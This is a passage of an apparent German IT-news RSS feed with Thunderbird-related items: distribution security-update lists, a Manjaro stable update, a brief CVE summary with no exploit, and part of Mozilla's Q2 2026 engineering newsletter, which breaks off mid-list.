<p>Gehen Sie auf „Personalisierung –› Farben“, scrollen Sie nach unten und stellen Sie sicher, dass neben „Akzentfarbe“ die Auswahl „manuell“ eingestellt ist. Wählen Sie darunter die gewünschte Farbe aus. Sie erscheint in allen nicht transparenten Titelleisten und an den Fensterrändern.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/2422724/die-besten-kostenlosen-e-mail-anbieter-vergleich.html" target="_blank" rel="noreferrer noopener">Die fünf besten kostenlosen E-Mail-Anbieter im Vergleich</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dienstag: US-Bundestaaten klagen gegen Fusion, Mindestalter für soziale Medien]]></title>
<description><![CDATA[Kartellklage von US-Bundesstaaten + Vorschlag von Expertenkommission + Urteil stärkt Urheberrecht + DB erntet Kritik + Thunderbird überarbeitet Einstellungen]]></description>
<link>https://tsecurity.de/de/3666845/it-nachrichten/dienstag-us-bundestaaten-klagen-gegen-fusion-mindestalter-fuer-soziale-medien/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666845/it-nachrichten/dienstag-us-bundestaaten-klagen-gegen-fusion-mindestalter-fuer-soziale-medien/</guid>
<pubDate>Tue, 14 Jul 2026 06:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kartellklage von US-Bundesstaaten + Vorschlag von Expertenkommission + Urteil stärkt Urheberrecht + DB erntet Kritik + Thunderbird überarbeitet Einstellungen]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird will Schluss mit Einstellungschaos machen]]></title>
<description><![CDATA[Das Thunderbird-Team plant eine umfassende Überarbeitung der Einstellungen, um diese verständlicher und leichter auffindbar zu machen.]]></description>
<link>https://tsecurity.de/de/3665786/it-nachrichten/thunderbird-will-schluss-mit-einstellungschaos-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665786/it-nachrichten/thunderbird-will-schluss-mit-einstellungschaos-machen/</guid>
<pubDate>Mon, 13 Jul 2026 18:05:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Thunderbird-Team plant eine umfassende Überarbeitung der Einstellungen, um diese verständlicher und leichter auffindbar zu machen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, libxfont, mesa, opam, and wireless-regdb), Fedora (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-d...]]></description>
<link>https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 13 Jul 2026 14:41:08 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, libxfont, mesa, opam, and wireless-regdb), <b>Fedora</b> (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-dulwich, python-idna, python-pillow, python-tornado, sssd, tmux, upower, webkitgtk, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Mageia</b> (libarchive and vim), <b>Oracle</b> (389-ds:1.4, buildah, cups, edk2, freerdp, golang, grafana, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, kernel, libexif, libsolv, libtasn1, libxml2, nginx:1.24, nginx:1.26, nodejs:22, nodejs:24, oci-seccomp-bpf-hook, podman, postgresql:18, python-urllib3, tigervnc, tomcat, unbound, and xorg-x11-server), <b>Slackware</b> (p11-kit), and <b>SUSE</b> (agama, dash, dracut, flannel, go1.26, gsasl, gstreamer-plugins-good, ImageMagick, imagemagick, kernel, krb5, krb5, krb5-mini, libIex-3_4-33, libmbedtls23, libxfont2, nasm, nghttp2, perl-CGI-Session, perl-dbi, perl-List-SomeUtils-XS, python-pillow, python-social-auth-app-django, python-urllib3, python313-Django4, python313-Django6, python313-pytest-html, python313-sqlparse, python313-websockets, rclone, rust-keylime, rustup, sccache, spectre-meltdown-checker, sssd, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, thunderbird, tiff, traefik2, xorg-x11-server, and xwayland).]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-07-11 - Kernels, COSMIC 1.2, Xorg, Firefox, Thunderbird, KDE Gear]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This also marks the stable release of ‘Bian-May’ - Manjaro 26.1. We will work now on the Release Candidate ISOs to test possible issues before releasing new install medias.
Current Promotions

Get the latest Gaming Laptop ...]]></description>
<link>https://tsecurity.de/de/3660964/unix-server/stable-update-2026-07-11-kernels-cosmic-12-xorg-firefox-thunderbird-kde-gear/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660964/unix-server/stable-update-2026-07-11-kernels-cosmic-12-xorg-firefox-thunderbird-kde-gear/</guid>
<pubDate>Sat, 11 Jul 2026 01:15:49 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This also marks the stable release of ‘Bian-May’ - Manjaro 26.1. We will work now on the Release Candidate ISOs to test possible issues before releasing new install medias.</p>
<h3><a name="p-865662-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-865662-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-865662-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-865662-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<h2><a name="p-865662-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-865662-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li><strong>linux70</strong> got removed from our repos</li>
<li><strong>linux-firmware</strong> <a href="https://gitlab.com/kernel-firmware/linux-firmware/-/compare/20260519...20260622?from_project_id=48890189">20260622</a></li>
<li>slight <strong>toolchain</strong> update</li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/274183/">610.43.03</a></li>
<li>we dropped <strong>NVIDIA</strong> driver series 570xx and 575xx</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.4/releasenotes/">152.0.4</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/152.0/releasenotes">152.0</a></li>
<li><strong>Virtualbox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.12</a></li>
<li><strong>Godot</strong> <a href="https://godotengine.org/releases/4.7/">4.7</a></li>
<li><strong>Pipewire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.7">1.6.7</a></li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.2...v261.1">261.1</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.2.0">1.2.0</a></li>
<li><strong>Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.6.6/">6.6.6</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.3/">26.04.3</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.2</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.5/releasenotes/">152.0.5</a></li>
<li><strong>Xorg-Server</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003718.html">21.1.24</a></li>
<li><strong>XWayland</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003717.html">24.1.13</a></li>
<li><strong>OpenSearch</strong> <a href="https://opensearch.org/blog/explore-opensearch-3-7/">3.7.0</a></li>
</ul>
<h2><a name="p-865662-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-865662-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.95</li>
<li>linux618 6.18.38</li>
<li>linux71 7.1.3</li>
<li>linux72 7.2.0-rc2</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/9/26 07:43 CEST)</p>
<ul>
<li>stable core x86_64:  121 new and 122 removed package(s)</li>
<li>stable extra x86_64:  4021 new and 4169 removed package(s)</li>
<li>stable multilib x86_64:  65 new and 70 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1205/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>3 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility Committee: July 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 1x - Views:3 July’s Accessibility Standards & Compliance meeting covered the final accessibility statement update, a discussion on right-sizing design accessibility annotations for implementation, and where accessibility guidance should live across design ...]]></description>
<link>https://tsecurity.de/de/3660805/video/accessibility-committee-july-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660805/video/accessibility-committee-july-2026/</guid>
<pubDate>Fri, 10 Jul 2026 22:54:07 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 1x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Qn_qu8-899I?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>July’s Accessibility Standards & Compliance meeting covered the final accessibility statement update, a discussion on right-sizing design accessibility annotations for implementation, and where accessibility guidance should live across design files, design system docs, tickets, and QA. The meeting also included an update on automated accessibility testing progress for Thunderbird Desktop.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3155 | Mozilla Thunderbird up to 102.2 on macOS Email Attachment access control (EUVD-2022-42579)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Mozilla Thunderbird up to 102.2 on macOS. Affected by this vulnerability is an unknown functionality of the component Email Attachment Handler. This manipulation causes improper access controls.

This vulnerability is registered as CVE-2022-...]]></description>
<link>https://tsecurity.de/de/3658590/sicherheitsluecken/cve-2022-3155-mozilla-thunderbird-up-to-1022-on-macos-email-attachment-access-control-euvd-2022-42579/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658590/sicherheitsluecken/cve-2022-3155-mozilla-thunderbird-up-to-1022-on-macos-email-attachment-access-control-euvd-2022-42579/</guid>
<pubDate>Fri, 10 Jul 2026 05:05:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.2</a> on macOS. Affected by this vulnerability is an unknown functionality of the component <em>Email Attachment Handler</em>. This manipulation causes improper access controls.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2022-3155">CVE-2022-3155</a>. Remote exploitation of the attack is possible. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Tooling Announcements: Engineering Effectiveness Newsletter (Q2 2026 Edition)]]></title>
<description><![CDATA[Welcome to the Q2 edition of the Engineering Effectiveness Newsletter! The Engineering Effectiveness org makes it easy to develop, test and release Mozilla software at scale. See below for some highlights, then read on for more detailed info!
Highlights 


Improved mach startup overhead by 30-50%...]]></description>
<link>https://tsecurity.de/de/3657816/tools/firefox-tooling-announcements-engineering-effectiveness-newsletter-q2-2026-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657816/tools/firefox-tooling-announcements-engineering-effectiveness-newsletter-q2-2026-edition/</guid>
<pubDate>Thu, 09 Jul 2026 19:08:33 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome to the Q2 edition of the Engineering Effectiveness Newsletter! The Engineering Effectiveness org makes it easy to develop, test and release Mozilla software at scale. See below for some highlights, then read on for more detailed info!</p>
<h3><a class="anchor" href="https://discourse.mozilla.org/#p-295620-highlights-image29x31uploadsijwaz2bmu1cm7txaoyutaj3g7djpeg-1" name="p-295620-highlights-image29x31uploadsijwaz2bmu1cm7txaoyutaj3g7djpeg-1"></a>Highlights <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/c/6/c64f1102bb6b55e5a9e11c7390019d84dcc69fbf.jpeg" rel="noopener nofollow ugc" title="image"><img alt="image" height="31" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/optimized/3X/c/6/c64f1102bb6b55e5a9e11c7390019d84dcc69fbf_2_29x31.jpeg" width="29"></a></div></h3>
<ul>
<li>
<p>Improved <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1775197">mach startup overhead</a> by 30-50%, as well as a 75% improvement for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018327">mach test on Windows</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017746">10s faster configure</a> for subsequent runs</p>
</li>
<li>
<p>Moved to weekly scheduled dot releases and <a href="https://docs.google.com/document/d/1oktCbzZ3M7NZTMBxv8yEOYmNHHxaIstZ55vRMI9PmzM/edit?tab=t.0#heading=h.r7335u1pggl8" rel="noopener nofollow ugc">faster rollouts</a>, allowing us to deliver fixes and uplifts to users faster and more reliably</p>
</li>
<li>
<p>Created a <a href="https://tests.firefox.dev/" rel="noopener nofollow ugc">huge number of dashboards</a> to help developers dig into Mochitest and XPCShell tests</p>
</li>
<li>
<p>Stood up <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037084">MacOS worker pools</a> that can run multiple tasks at once using VMs, greatly improving our Mac capacity issues</p>
</li>
<li>
<p>Can now <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034982">navigate to about:pdf</a> in Nightly to open and edit arbitrary PDF files, including the ability to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2047633">set Firefox as your default PDF editor</a> on MacOS</p>
</li>
</ul>
<h3><a class="anchor" href="https://discourse.mozilla.org/#p-295620-detailed-project-updates-2" name="p-295620-detailed-project-updates-2"></a>Detailed Project Updates</h3>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-ai-for-development-image38x38uploaduslsg1wyqmsnwpkkcpts9bzsgdspng-3" name="p-295620-ai-for-development-image38x38uploaduslsg1wyqmsnwpkkcpts9bzsgdspng-3"></a>AI for Development <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/d/5/d581d7036fa3d622443350328d622c936216ecf6.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="38" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/d/5/d581d7036fa3d622443350328d622c936216ecf6.png" width="38"></a></div></h4>
<ul>
<li>
<p>Suhaib Mujahid deployed the initial version of <a href="https://docs.google.com/document/d/1cLIuNnhefePsixu8iRiqAn75EcVvgQHw48pUTkhpwok/edit?tab=t.0" rel="noopener nofollow ugc">Hackbot</a>, a platform for building and running AI agents to automate parts of the Firefox development workflow.</p>
</li>
<li>
<p>Evgeny Pavlov ported the “Build Repair Agent” to Hackbot and deployed it for testing. It now monitors Firefox build failures and triggers the agent. When an analysis and a proposed patch are ready developers can be notified by email.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-bugzilla-image16x16uploadrcf6wygovavtrjvslvu8pj7vnyhpng-4" name="p-295620-bugzilla-image16x16uploadrcf6wygovavtrjvslvu8pj7vnyhpng-4"></a>Bugzilla <img alt="image" height="16" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/b/e/bea92544acb6ddb5aa665316f3c7411bc860c8db.png" width="16"></h4>
<ul>
<li>
<p>David Lawrence added a new GitHubPullRequests extension that renders a live status panel in the bug modal for any attachment whose content type is text/x-github-pull-request. A new REST endpoint fetches PR metadata (state, author, labels, latest review per reviewer) from the GitHub REST API on demand, and a client-side script populates a table with a “show closed/merged” toggle.[image]</p>
</li>
<li>
<p>Xavier L’Hour improved the user experience for developers, adding shortcuts to buglist.cgi for all, open, or closed bugs (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1764713">1764713</a>)</p>
</li>
<li>
<p>Xavier L’Hour added a new shortcut button to the bug page that allows users to quickly move spam bugs to the Invalid Bugs product (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1684509">1684509</a>).</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-build-system-and-mach-environment-image27x27uploadoumafz5bcpgk6de6ddcb6m1uzptpng-5" name="p-295620-build-system-and-mach-environment-image27x27uploadoumafz5bcpgk6de6ddcb6m1uzptpng-5"></a>Build System and Mach Environment <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/a/e/ae9342c7f7dcfe9d427c191b43c7aaf993ceeffb.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="27" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/optimized/3X/a/e/ae9342c7f7dcfe9d427c191b43c7aaf993ceeffb_2_27x27.png" width="27"></a></div></h4>
<ul>
<li>
<p>Alex Hochheiden has been moving build system logic out of make to pave the way for a new build system backend (coming soon). See <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038789">Bug 2038789</a>.</p>
</li>
<li>
<p>Alex Hochheiden landed a 30%-50% (platform dependent) speedup for mach startup. See <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1775197">Bug 1775197</a>.</p>
</li>
<li>
<p>Alex Hochheiden sped up subsequent configure runs by ~10s by adding caching to the mach taskgraph toolchain step. See <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017746">Bug 2017746</a>.</p>
</li>
<li>
<p>Alex Hochheiden reduced mach test startup overhead on Windows by 75%. See <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018327">Bug 2018327</a>.</p>
</li>
<li>
<p>Alex Hochheiden has achieved significant code deduplication and simplification by consolidating the Android Gradle configuration into convention plugins. There were also various Gradle configure-cache improvements. See <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2007013">Bug 2007013</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1950099">Bug 1950099</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2013417">Bug 2013417</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017752">Bug 2017752</a>, and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017753">Bug 2017753</a>.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-firefox-ci-image25x26uploadga1rfuc1fs6gwtrx3kk92r8hfncjpeg-6" name="p-295620-firefox-ci-image25x26uploadga1rfuc1fs6gwtrx3kk92r8hfncjpeg-6"></a>Firefox-CI <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/7/4/74356ec644bf30f10ea5f0ce6067cdd819ea96e4.jpeg" rel="noopener nofollow ugc" title="image"><img alt="image" height="26" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/optimized/3X/7/4/74356ec644bf30f10ea5f0ce6067cdd819ea96e4_2_25x26.jpeg" width="25"></a></div></h4>
<ul>
<li>
<p>Julien Cristau <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2050408">added support</a> for interactive tasks (aka one click loaners) on Windows and macOS</p>
</li>
<li>
<p>Andrew Halberstadt <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2044330">implemented</a> mach try support with Github, being used in mozilla/enterprise-firefox-try and coming to Firefox soon.</p>
</li>
<li>
<p>Andrew Halberstadt <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033838">implemented the machinery</a> to start making Gecko CI tasks clone from Github.</p>
</li>
<li>
<p>Ryan Curran <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037084">brought Firefox CI’s Apple Silicon VM infrastructure into production</a>. Building on the MacOS CI image pipeline established last year, he migrated test suites onto virtual machines and grew the macosx1500-aarch64-vms pool so Taskcluster now routes eligible jobs to VMs alongside physical hardware. This reduces reliance on physical Macs, increases CI capacity, and supports the ongoing migration off of older Intel-based macOS infrastructure</p>
</li>
<li>
<p>Jonathan Moss migrated Firefox CI’s cloud-based Windows testing from Windows 11 24H2 to 25H2, moving the bulk of Firefox’s Windows test coverage to Microsoft’s latest platform and keeping CI aligned with the Windows version most commonly used by Firefox Desktop users</p>
</li>
<li>
<p>Florian Quèze <a href="https://tests.firefox.dev/" rel="noopener nofollow ugc">created many dashboards</a> to help dig into Mochitests and XPCShell tests</p>
</li>
<li>
<p>Ryan VanderMeulen landed a set of improvements to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032657">mach try chooser</a>. The update adds an exclude filter, a clearer preview pane with removable job rows, an artifact-builds toggle, and a warning when a selection exceeds task-prioritization thresholds. It also fixes a bug where choosing Firefox for Android jobs would unintentionally clear selections for other platforms.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-lint-static-analysis-and-code-coverage-image27x27uploadkn3nhhyhkaolavr6gxkheo6anzipng-7" name="p-295620-lint-static-analysis-and-code-coverage-image27x27uploadkn3nhhyhkaolavr6gxkheo6anzipng-7"></a>Lint, Static Analysis and Code Coverage <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/9/1/91b73ae1a5bbfd19ca329cc65f4d62b37af7e5aa.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="27" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/optimized/3X/9/1/91b73ae1a5bbfd19ca329cc65f4d62b37af7e5aa_2_27x27.png" width="27"></a></div></h4>
<ul>
<li>
<p>Valentin Rigal and Bastien Abadie created a Code Review Bot prototype for publication of review comments using various source linters on Github</p>
</li>
<li>
<p>Morgan Rae Reschenberg added support for accessibility review to Code Review Bot</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-mozregression-image39x39uploadylbryrsvu4qhpj3mc4hc711j7vtpng-8" name="p-295620-mozregression-image39x39uploadylbryrsvu4qhpj3mc4hc711j7vtpng-8"></a>Mozregression <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/f/0/f0af28d9caa6771eea75f11a03fc36a70c4f99d3.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="39" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/f/0/f0af28d9caa6771eea75f11a03fc36a70c4f99d3.png" width="39"></a></div></h4>
<ul>
<li>Zeid fixed a bug in mozregression-gui on macOS, where the camera and microphone capture request was getting rejected (released in 7.3.0). Thanks to bug report + tip from Andreas Pehrson.</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-pdfjs-image29x29upload2uk22g71cqevreav3jhzijhygjypng-9" name="p-295620-pdfjs-image29x29upload2uk22g71cqevreav3jhzijhygjypng-9"></a>PDF.js <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/1/4/14623e0fefd12c91cad11a97baf9fca17c37df1c.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="29" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/1/4/14623e0fefd12c91cad11a97baf9fca17c37df1c.png" width="29"></a></div></h4>
<ul>
<li>
<p>Calixte <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034982">added about:pdf to use an entrypoint</a> for opening and editing arbitrary PDF files[image]</p>
</li>
<li>
<p>Calixte added support for playing videos/sounds embedded in PDF files</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-phabricator-image24x24upload2ptgi5cxdz7gakmm6kmos0gcoebpng-moz-phab-and-lando-image31x31uploadgmikcks6na3yujyuukfnivfqrmwpng-10" name="p-295620-phabricator-image24x24upload2ptgi5cxdz7gakmm6kmos0gcoebpng-moz-phab-and-lando-image31x31uploadgmikcks6na3yujyuukfnivfqrmwpng-10"></a>Phabricator <img alt="image" height="24" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/1/3/13d60ed2ffbfe1aa32c2cc2ccc5121ba3b8c5a87.png" width="24">, moz-phab, and Lando <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/7/5/75a4b58f20908eed139910e672355b6e4ac88562.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="31" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/7/5/75a4b58f20908eed139910e672355b6e4ac88562.png" width="31"></a></div></h4>
<ul>
<li>
<p>Connor Sheehan improved the uplift experience by leveraging Lando to manage the assessment forms, train selection, and automatic application, so conflicts are detected earlier. The number of uplifts via Lando has <a href="https://sql.telemetry.mozilla.org/dashboard/uplift-dashboard?p_date_range=d_last_12_months">out-paced</a> those via Moz-Phab, and sailed through the rise in uplift numbers (likely due to more sec-bugs getting fixed and uplifted).</p>
</li>
<li>
<p>Zeid added support for private GitHub repositories in Lando, allowing security patches to be implemented in a private clone of a repo, and pushed to the public one.</p>
</li>
<li>
